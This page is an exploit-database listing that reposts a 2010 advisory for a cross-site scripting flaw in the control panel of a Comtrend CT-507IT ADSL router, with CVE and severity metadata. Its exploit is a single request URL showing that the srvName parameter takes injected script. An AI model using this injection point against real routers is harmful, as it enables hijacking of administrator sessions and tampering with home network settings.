Advertisement






cpanel of Comtrend ADSL Router - XSS

CVE Category Price Severity
CVE-2016-10523 CWE-79 $500 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2010-02-07
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010020152

Below is a copy:

# Exploit Title: XSS in cpanel of Comtrend ADSL Router
# Date: 23-1-2010
# Author: Yoyahack
# Software: Comtrend
# Version:  CT-507IT


/*
XSS in the control panel Comtrend ADSL Router
*/
/*
Autor: Yoyahack
Site:  undersecurity.net<http://undersecurity.net>
*/
Exploit:

http://Serve/scvrtsrv.cmd?action=add&srvName=XSS_HERE&srvAddr=192.168.1.1&proto=1,&eStart=1,&eEnd=1,&iStart=1,&iEnd=1,






Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.